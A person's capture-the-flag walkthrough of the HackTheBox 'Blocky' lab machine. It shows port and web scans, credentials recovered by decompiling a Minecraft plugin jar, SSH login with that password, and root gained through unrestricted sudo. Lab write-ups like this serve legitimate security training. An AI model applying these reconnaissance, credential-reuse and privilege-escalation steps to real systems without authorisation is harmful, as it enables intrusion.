HackTheBox Blocky Walkthrough
Initial Enumeration
I started the initial enumeration by running a full port scan using nmap looking for open ports and running services.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ nmap -sC -sV -p- -T5 -oN nmap/all-ports 10.10.10.37
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:04 IST
Nmap scan report for blocky.htb (10.10.10.37)
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 4.8
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.72 seconds
We have five different ports open:
Port 21 - FTP ProFTPD 1.3.5a
Port 22 - SSH
Port 80 - Apache httpd 2.4.18
Port 8192 - sophos
Port 25565 - Minecraft server 1.11.2
Let's start the enumeration with port 80 first.
Web Enumeration and User Shell
When we visit the url http://10.10.10.37 in our web browser, it redirects to http://blocky.htb. So let's add the blocky.htb
hostname to our /etc/hosts
file.
┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.37 blocky.htb
Now when we visit http://blocky.htb
in our web browser, it shows us a WordPress website.
After looking at one of the posts, I found a username notch.
Next I performed a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blocky.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/12 11:05:08 Starting gobuster in directory enumeration mode
===============================================================
/wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/wp-includes (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/javascript (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/server-status (Status: 403) [Size: 298]
===============================================================
2022/07/12 12:02:45 Finished
===============================================================
Let's check all these directories one by one.
http://blocky.htb/wiki
- This has nothing useful.
http://blocky.htb/phpmyadmin
- This contains the normal phpmyadmin installation but we do not have the credentials to login.
http://blocky.htb/plugins
- This contains two .jar
files. I downloaded both of them into my system.
To further enumerate these, I decompiled the binaries using the jd-gui tool. The griefprevention-1.11.2-3.1.1.298.jar
is a GriefPrevention plugin from Minecraft Forge. It is less likely to contain any vulnerabilities.
The BlockyCore.jar
contains an sql username and password.
Next I performed a wpscan to look for WordPress users and vulnerable plugins.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ wpscan --url http://blocky.htb -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Jul 12 15:30:11 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://blocky.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://blocky.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <====================================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 12 15:30:23 2022
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 14.556 KB
[+] Data Received: 458.008 KB
[+] Memory used: 227.941 MB
[+] Elapsed time: 00:00:11
We have only one wordpress user. I tried login using this username and the password we found earlier into /wp-admin
but it doesn't work.
But we can login using these credentials as user notch
via SSH.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@blocky.htb
The authenticity of host 'blocky.htb (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'blocky.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Tue Jul 12 02:28:22 2022 from 10.10.14.5
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
We got a shell! Now we can read our user flag present in the home directory of user notch.
notch@Blocky:~$ cat user.txt
b1ec3aef************************
Root Shell
Getting a root shell was a piece of cake! I used the sudo -l
command to check if the user notch can run any command as root.
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
Bingo! The user can run all commands as user root. So we can use the following command to get a shell as user root.
notch@Blocky:~$ sudo su -
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
Hurray! We are root. Now we can read our final flag present in the root directory.
root@Blocky:~# cat root.txt
79e5ef26************************
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Bradley Armstrong.